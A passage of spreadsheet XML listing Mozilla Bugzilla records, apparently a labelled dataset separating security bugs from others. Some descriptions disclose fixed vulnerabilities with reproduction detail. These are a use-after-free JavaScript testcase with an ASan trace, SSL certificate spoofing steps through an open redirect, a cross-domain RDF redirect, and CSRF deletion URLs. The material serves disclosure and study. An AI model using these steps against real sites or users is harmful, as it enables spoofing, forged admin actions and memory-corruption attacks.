          <t>All</t>
        </is>
      </c>
      <c r="M3610" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3610" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3610" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3610" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+][qa-]</t>
        </is>
      </c>
      <c r="Q3610" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3610" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T3610" t="n">
        <v>1</v>
      </c>
      <c r="U3610" t="n">
        <v>0</v>
      </c>
      <c r="V3610" t="n">
        <v>38</v>
      </c>
      <c r="W3610" t="inlineStr">
        <is>
          <t>I was just looking at a topcrash, bug 950653 (see bug 950653 comment 106 for more info). I noticed that the mozJSComponentLoader::mThisObjects script/object hash table is not traced explicitly. There are two places where we add new items:
(1) mozJSComponentLoader::ObjectForLocation. Here we do:
    JS_AddNamedObjectRoot(cx, aObject, *aLocation);
    JS_AddNamedScriptRoot(cx, aTableScript, *aLocation);
(2) mozJSComponentLoader::NoteSubScript, which does not do anything like this.
Is it possible that (2) is not correctly keeping the script/object alive, and we can run into use-after-free bugs? Am I missing something?
Also CC'ing Terrence to make sure he's aware of this table for GGC.</t>
        </is>
      </c>
      <c r="X3610" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3611">
      <c r="A3611" t="n">
        <v>605306</v>
      </c>
      <c r="B3611" t="inlineStr">
        <is>
          <t>2010-10-18 15:34:43 -0700</t>
        </is>
      </c>
      <c r="C3611" t="inlineStr">
        <is>
          <t>[tracking] make all unittests pass</t>
        </is>
      </c>
      <c r="D3611" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3611" t="n">
        <v>1</v>
      </c>
      <c r="F3611" t="n">
        <v>1</v>
      </c>
      <c r="G3611" t="n">
        <v>4</v>
      </c>
      <c r="H3611" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3611" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3611" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3611" t="inlineStr">
        <is>
          <t>1.8</t>
        </is>
      </c>
      <c r="L3611" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3611" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3611" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3611" t="inlineStr"/>
      <c r="Q3611" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3611" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3611" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3611" t="n">
        <v>1</v>
      </c>
      <c r="U3611" t="n">
        <v>0</v>
      </c>
      <c r="V3611" t="n">
        <v>21</v>
      </c>
      <c r="W3611" t="inlineStr">
        <is>
          <t>We are close to having all unittest pass on Hudson. I've examined the few remaining and I think they should be disabled (will have a patch for this momentarily).
Once all unittests pass, we can focus on improving code coverage and not breaking existing tests (unless they are broken and/or useless, in which case we should disable or remove them as needed).</t>
        </is>
      </c>
      <c r="X3611" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3612">
      <c r="A3612" t="n">
        <v>1659129</v>
      </c>
      <c r="B3612" t="inlineStr">
        <is>
          <t>2020-08-14 08:16:19 -0700</t>
        </is>
      </c>
      <c r="C3612" t="inlineStr">
        <is>
          <t>It is not apparent when Devtools remote debugging is enabled [ZDI-CAN-11725]</t>
        </is>
      </c>
      <c r="D3612" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:05 -0800</t>
        </is>
      </c>
      <c r="E3612" t="n">
        <v>1</v>
      </c>
      <c r="F3612" t="n">
        <v>1</v>
      </c>
      <c r="G3612" t="n">
        <v>3</v>
      </c>
      <c r="H3612" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3612" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3612" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3612" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3612" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3612" t="inlineStr">
        <is>
          <t>[Disclosure deadline 2021-02-04][adv-main87+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3612" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3612" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3612" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T3612" t="n">
        <v>1</v>
      </c>
      <c r="U3612" t="n">
        <v>0</v>
      </c>
      <c r="V3612" t="n">
        <v>37</v>
      </c>
      <c r="W3612" t="inlineStr">
        <is>
          <t>Created attachment 9170053
firefox.pdf
The attached file comes via ZDI, and reports that when the Devtools dbugging is in an insecure configuration, such as `devtools.debugger.prompt-connection` is false and `remote-enabled` is true; there is no visual indicator to the user; and that this has been abused by malware in the past.</t>
        </is>
      </c>
      <c r="X3612" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3613">
      <c r="A3613" t="n">
        <v>414540</v>
      </c>
      <c r="B3613" t="inlineStr">
        <is>
          <t>2008-01-29 04:09:52 -0800</t>
        </is>
      </c>
      <c r="C3613" t="inlineStr">
        <is>
          <t>RDFXMLDataSource should reject cross-domain redirects</t>
        </is>
      </c>
      <c r="D3613" t="inlineStr">
        <is>
          <t>2018-08-03 07:06:55 -0700</t>
        </is>
      </c>
      <c r="E3613" t="n">
        <v>1</v>
      </c>
      <c r="F3613" t="n">
        <v>1</v>
      </c>
      <c r="G3613" t="n">
        <v>6</v>
      </c>
      <c r="H3613" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3613" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3613" t="inlineStr">
        <is>
          <t>RDF</t>
        </is>
      </c>
      <c r="K3613" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3613" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3613" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3613" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3613" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3613" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3613" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3613" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3613" t="n">
        <v>1</v>
      </c>
      <c r="U3613" t="n">
        <v>0</v>
      </c>
      <c r="V3613" t="n">
        <v>40</v>
      </c>
      <c r="W3613" t="inlineStr">
        <is>
          <t>Created attachment 299989
rdf3a.xul - won't work from bugzilla, needs redirect
it is possible to still RDF from any http hosts via:
datasources="/cgi-bin/re?http://SOMEWHERE/steal.rdf"
if the RDF structure is known
/cgi-bin/re does a http redirect
testcase won't work from bugzilla
not clear if this allows stealing arbitrary XML.
both trunk and 2.0 are vulnerable</t>
        </is>
      </c>
      <c r="X3613" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3614">
      <c r="A3614" t="n">
        <v>466692</v>
      </c>
      <c r="B3614" t="inlineStr">
        <is>
          <t>2008-11-25 11:29:36 -0800</t>
        </is>
      </c>
      <c r="C3614" t="inlineStr">
        <is>
          <t>[SECURITY] keywords and unused flag types can be deleted by bypassing the token check</t>
        </is>
      </c>
      <c r="D3614" t="inlineStr">
        <is>
          <t>2009-02-02 17:05:31 -0800</t>
        </is>
      </c>
      <c r="E3614" t="n">
        <v>1</v>
      </c>
      <c r="F3614" t="n">
        <v>1</v>
      </c>
      <c r="G3614" t="n">
        <v>4</v>
      </c>
      <c r="H3614" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3614" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3614" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3614" t="inlineStr">
        <is>
          <t>2.22.1</t>
        </is>
      </c>
      <c r="L3614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3614" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3614" t="inlineStr"/>
      <c r="Q3614" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3614" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3614" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T3614" t="n">
        <v>1</v>
      </c>
      <c r="U3614" t="n">
        <v>0</v>
      </c>
      <c r="V3614" t="n">
        <v>19</v>
      </c>
      <c r="W3614" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #281181 +++
This may have been covered before a long time ago, and not been considered an issue, but if I could get an admin to click on the following URLs (which are intentionally broken to avoid any accidents, but you get the point), this could really mess things up, couldn't it? 
http://[webserver]/editkeywords.cgi?action=delete&amp;id=[number]
http://[webserver]/editflagtypes.cgi?action=confirmdelete&amp;id=[number]
... and especially if it is in fact a script or a "page" with embedded "images" or iframes enumerating all possible values of [number].
Would it make sense for an equivalent "token" to be embedded in the URL for keyword/flag/(etc.?) deletion? ... or for any other significant privileged action accessed via GET?
A malicious user would not know what to supply to make an admin click on (e.g.):
http://[webserver]/editkeywords.cgi?action=delete&amp;id=[number]&amp;token=[token]
... and unlike "all possible values of [number]", certainly couldn't enumerate "all possible values of [token]" too.</t>
        </is>
      </c>
      <c r="X3614" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3615">
      <c r="A3615" t="n">
        <v>1735265</v>
      </c>
      <c r="B3615" t="inlineStr">
        <is>
          <t>2021-10-11 20:55:32 -0700</t>
        </is>
      </c>
      <c r="C3615" t="inlineStr">
        <is>
          <t>Firefox incorrectly draws outside of iframe.</t>
        </is>
      </c>
      <c r="D3615" t="inlineStr">
        <is>
          <t>2024-05-30 10:49:38 -0700</t>
        </is>
      </c>
      <c r="E3615" t="n">
        <v>1</v>
      </c>
      <c r="F3615" t="n">
        <v>1</v>
      </c>
      <c r="G3615" t="n">
        <v>3</v>
      </c>
      <c r="H3615" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3615" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3615" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K3615" t="inlineStr">
        <is>
          <t>Firefox 93</t>
        </is>
      </c>
      <c r="L3615" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3615" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3615" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3615" t="inlineStr">
        <is>
          <t>[adv-main99+][adv-esr91.8+]</t>
        </is>
      </c>
      <c r="Q3615" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3615" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3615" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T3615" t="n">
        <v>1</v>
      </c>
      <c r="U3615" t="n">
        <v>1</v>
      </c>
      <c r="V3615" t="n">
        <v>41</v>
      </c>
      <c r="W3615" t="inlineStr">
        <is>
          <t>Created attachment 9245388
parent.html
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Steps to reproduce:
1. open 'parent.html' on Firefox 93.
2. load 'child.html' by executing Js code
set_frame('./child.html');
Actual results:
The content in iframe is drawn outside of iframe even if 'child.html' is loaded from a local server.
Expected results:
The content in iframe should not be drawn outside of iframe.</t>
        </is>
      </c>
      <c r="X3615" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3616">
      <c r="A3616" t="n">
        <v>1106646</v>
      </c>
      <c r="B3616" t="inlineStr">
        <is>
          <t>2014-12-01 15:52:52 -0800</t>
        </is>
      </c>
      <c r="C3616" t="inlineStr">
        <is>
          <t>Shortcut for toggle pending/running/in-progress appears to only sporadically work.</t>
        </is>
      </c>
      <c r="D3616" t="inlineStr">
        <is>
          <t>2015-11-17 09:34:59 -0800</t>
        </is>
      </c>
      <c r="E3616" t="n">
        <v>1</v>
      </c>
      <c r="F3616" t="n">
        <v>1</v>
      </c>
      <c r="G3616" t="n">
        <v>7</v>
      </c>
      <c r="H3616" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3616" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3616" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3616" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3616" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3616" t="inlineStr"/>
      <c r="Q3616" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3616" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3616" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3616" t="n">
        <v>1</v>
      </c>
      <c r="U3616" t="n">
        <v>0</v>
      </c>
      <c r="V3616" t="n">
        <v>16</v>
      </c>
      <c r="W3616" t="inlineStr">
        <is>
          <t>When looking at production (or running locally) when I have a result set with either running or pending jobs, and I type "i" to toggle them, often nothing happens.
To reproduce:
o go to production
o open any result set with in-progress jobs, eg. in a single page
o type "i" to toggle them
Expected:
The jobs get toggled.
Observed:
Almost all of the time, they don't get toggled.
I wonder if it is just me, or if anyone else can reproduce it.</t>
        </is>
      </c>
      <c r="X3616" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3617">
      <c r="A3617" t="n">
        <v>794025</v>
      </c>
      <c r="B3617" t="inlineStr">
        <is>
          <t>2012-09-25 04:02:32 -0700</t>
        </is>
      </c>
      <c r="C3617" t="inlineStr">
        <is>
          <t>AddressSanitizer heap-use-after-free in [@ js::mjit::CallCompiler::generateNativeStub]</t>
        </is>
      </c>
      <c r="D3617" t="inlineStr">
        <is>
          <t>2020-02-28 03:03:18 -0800</t>
        </is>
      </c>
      <c r="E3617" t="n">
        <v>1</v>
      </c>
      <c r="F3617" t="n">
        <v>1</v>
      </c>
      <c r="G3617" t="n">
        <v>3</v>
      </c>
      <c r="H3617" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3617" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3617" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3617" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3617" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3617" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3617" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3617" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3617" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3617" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3617" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3617" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3617" t="n">
        <v>1</v>
      </c>
      <c r="U3617" t="n">
        <v>0</v>
      </c>
      <c r="V3617" t="n">
        <v>11</v>
      </c>
      <c r="W3617" t="inlineStr">
        <is>
          <t>The following testcase triggers an ASan error on mozilla-central revision e327e66a027d (no options required):
function getterFunction(v) { return "getter"; }
Object.defineProperty(Array.prototype, 1,{ 
  get: getterFunction, 
});
var N = (10000);
repeat_str("try { f(); } finally {\n", N),
repeat_str("}", ("" ));
function repeat_str(str, repeat_count) {
  var arr = new Array(--repeat_count);
  while (repeat_count != 0)
    arr[--repeat_count] = str;
  return str.concat.apply(str, arr);
}
ASan trace:
==24366== ERROR: AddressSanitizer heap-use-after-free on address 0x7f19004f036c at pc 0xc1a8fb bp 0x7fff512c8450 sp 0x7fff512c8448
READ of size 8 at 0x7f19004f036c thread T0
    #0 0xc1a8fa in js::mjit::CallCompiler::generateNativeStub() js/src/methodjit/MonoIC.cpp:1082
    #1 0xc191a2 in js::mjit::ic::NativeCall(js::VMFrame&amp;, js::mjit::ic::CallICInfo*) js/src/methodjit/MonoIC.cpp:1308
    #2 0xa6da22 in throwpoline_exit js/src/methodjit/MethodJIT.cpp:0
    #3 0xa6e249 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) js/src/methodjit/MethodJIT.cpp:1045
    #4 0xa6ed7b in JSContext::fp() const js/src/methodjit/MethodJIT.cpp:1103
    #5 0x5d9873 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:1487
    #6 0x5bbb03 in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #7 0x5e8fbf in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) js/src/jsinterp.cpp:509
    #8 0x5e9519 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:546
    #9 0x46d6f3 in JS_ExecuteScript js/src/jsapi.cpp:5632
    #10 0x41f5b4 in Process(JSContext*, JSObject*, char const*, bool) js/src/shell/js.cpp:439
    #11 0x41d3ed in ProcessArgs(JSContext*, JSObject*, js::cli::OptionParser*) js/src/shell/js.cpp:4700
    #12 0x41e309 in main js/src/shell/js.cpp:4944
    #13 0x7f1906bafcdc in __libc_start_main ??:0
0x7f19004f036c is located 748 bytes inside of 1028-byte region [0x7f19004f0080,0x7f19004f0484)
freed by thread T0 here:
    #0 0xf56840 in __interceptor_free ??:0
    #1 0xa72f57 in js_free ./dist/include/js/Utility.h:170
previously allocated by thread T0 here:
    #0 0xf56971 in __interceptor_calloc ??:0
    #1 0xaa2ed9 in js_calloc ./dist/include/js/Utility.h:159
    #2 0xa79e92 in js::mjit::Compiler::performCompilation() js/src/methodjit/Compiler.cpp:564
    #3 0xa78cb5 in js::mjit::Compiler::compile() js/src/methodjit/Compiler.cpp:140
    #4 0x5d8876 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:1480
    #5 0x5bbb03 in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #6 0x5e8fbf in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) js/src/jsinterp.cpp:509
    #7 0x5e9519 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:546
    #8 0x46d6f3 in JS_ExecuteScript js/src/jsapi.cpp:5632
    #9 0x41f5b4 in Process(JSContext*, JSObject*, char const*, bool) js/src/shell/js.cpp:439
    #10 0x41d3ed in ProcessArgs(JSContext*, JSObject*, js::cli::OptionParser*) js/src/shell/js.cpp:4700
    #11 0x41e309 in main js/src/shell/js.cpp:4944
    #12 0x7f1906bafcdc in __libc_start_main ??:0
The issue is also visible in Valgrind which might be easier for debugging purposes. Assuming sec-critical because it seems that we're using a JITChunk (compiled part of a script) after it has been free'd.</t>
        </is>
      </c>
      <c r="X3617" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3618">
      <c r="A3618" t="n">
        <v>507775</v>
      </c>
      <c r="B3618" t="inlineStr">
        <is>
          <t>2009-07-31 21:53:52 -0700</t>
        </is>
      </c>
      <c r="C3618" t="inlineStr">
        <is>
          <t>Firefox crashes upon closing when selecting display:block for everything (* selector) in CSS with Firebug in [@ @0x0 | @0x349d7ff][@ @0x0 - nsLineLayout::ReflowFrame]</t>
        </is>
      </c>
      <c r="D3618" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:31 -0700</t>
        </is>
      </c>
      <c r="E3618" t="n">
        <v>1</v>
      </c>
      <c r="F3618" t="n">
        <v>1</v>
      </c>
      <c r="G3618" t="n">
        <v>3</v>
      </c>
      <c r="H3618" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3618" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3618" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K3618" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3618" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3618" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3618" t="inlineStr">
        <is>
          <t>[sg:critical] [qa-needs-str]</t>
        </is>
      </c>
      <c r="Q3618" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3618" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3618" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T3618" t="n">
        <v>1</v>
      </c>
      <c r="U3618" t="n">
        <v>0</v>
      </c>
      <c r="V3618" t="n">
        <v>51</v>
      </c>
      <c r="W3618" t="inlineStr">
        <is>
          <t>I noticed that Firefox can crash upon closedown when you do the following:
1. Install Firebug from https://addons.mozilla.org/de/firefox/addon/1843 and restart.
2. Load a random XUL document in Firefox.
3. Start up Firebug for this XUL document.
4. Go to the Styles tab on the right and select the '*' selector.
5. Change the 'display' property to block.
6. Close Firefox. 
--&gt; Crash with http://crash-stats.mozilla.com/report/index/226e45b8-3da0-4fee-90ca-164f62090731
I can't really say what causes that crash, thus component 'General'.</t>
        </is>
      </c>
      <c r="X3618" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3619">
      <c r="A3619" t="n">
        <v>240053</v>
      </c>
      <c r="B3619" t="inlineStr">
        <is>
          <t>2004-04-08 15:40:38 -0700</t>
        </is>
      </c>
      <c r="C3619" t="inlineStr">
        <is>
          <t>SSL Certificate Spoof -- Allows malicious page to present SSL certificate from another site</t>
        </is>
      </c>
      <c r="D3619" t="inlineStr">
        <is>
          <t>2020-12-15 04:48:28 -0800</t>
        </is>
      </c>
      <c r="E3619" t="n">
        <v>1</v>
      </c>
      <c r="F3619" t="n">
        <v>1</v>
      </c>
      <c r="G3619" t="n">
        <v>3</v>
      </c>
      <c r="H3619" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3619" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3619" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3619" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3619" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3619" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3619" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3619" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3619" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3619" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3619" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T3619" t="n">
        <v>1</v>
      </c>
      <c r="U3619" t="n">
        <v>0</v>
      </c>
      <c r="V3619" t="n">
        <v>52</v>
      </c>
      <c r="W3619" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113
I believe I have discovered a potential security vulnerability in Mozilla 1.6 
and FireFox 0.8.  It is likely that the bug also extends to other versions of 
Mozilla.  The bug is a confidence-hack of sorts, allowing a malicious page to 
appear encrypted and present the certificate of another site.
Reproducible: Always
Steps to Reproduce:
1. Create a page on a non-SSL server that has a JavaScript or META redirect to 
the SSL-site whose certificate you want to spoof.
2. Your redirect should go to a script on that SSL-site that will redirect you 
somewhere else, and you need to be able to control where.
3. Have the SSL-site redirect the browser to an invalid domain (something 
syntactically invalid like http://a.b&amp;c)
4. Use FireFox 0.8 to browse to the page you created in step 1.
6. An error will popup in FireFox. Click ok.
7. Your browser will still be on the original page from step 1 but the security-
lock icon will still be on in the lower-left corner of FireFox.
8. Click the security icon and click the "View" button to view the certificate.
9. FireFox will present the certificate from the SSL-enabled site.
    I've created a simple test-case of the above scenario.  I simply searched 
on Google for "redirect.cfm" to find any site with a common ColdFusion redirect 
script.  I found emailfactory.com as the third result in Google.  Then I 
created a page to redirect the browser to 
https://www.emailfactory.com/redirect.cfm?redirect=a.b&amp;c.  This makes 
emailfactory.com redirect the browser to a.b&amp;c, which is invalid and causes 
Mozilla to remain on the current page and display a domain not found error.
    You can view this example at: http://www.ttar.org/test.html
Actual Results:  
Mozilla's security icon remained on and clicking it showed the certificate of 
the spoofed SSL site.
While there is an error popup notifying the user that Mozilla could not resolve 
the domain, that warning is likely not enough for the average user to realize 
that the security-icon and certificate visible on the page are invalid.
Expected Results:  
The security icon shouldn't be on.
This bug has also been emailed to security@mozilla.org</t>
        </is>
      </c>
      <c r="X3619" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3620">
      <c r="A3620" t="n">
        <v>891183</v>
      </c>
      <c r="B3620" t="inlineStr">
        <is>
          <t>2013-07-08 17:39:55 -0700</t>
        </is>
      </c>
      <c r="C3620" t="inlineStr">
        <is>
          <t>[FIG] Change Title strip to Tabs strip for tablets</t>
        </is>
      </c>
      <c r="D3620" t="inlineStr">
        <is>
          <t>2020-12-21 10:36:49 -0800</t>
        </is>
      </c>
      <c r="E3620" t="n">
        <v>1</v>
      </c>
      <c r="F3620" t="n">
        <v>1</v>
      </c>
      <c r="G3620" t="n">
        <v>6</v>
      </c>
      <c r="H3620" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3620" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3620" t="inlineStr">
        <is>
          <t>Theme and Visual Design</t>
        </is>
      </c>
      <c r="K3620" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3620" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3620" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3620" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3620" t="inlineStr">
        <is>
          <t>fixed-fig</t>
        </is>
      </c>
      <c r="Q3620" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3620" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3620" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T3620" t="n">
        <v>1</v>
      </c>
      <c r="U3620" t="n">
        <v>0</v>
      </c>
      <c r="V3620" t="n">
        <v>36</v>
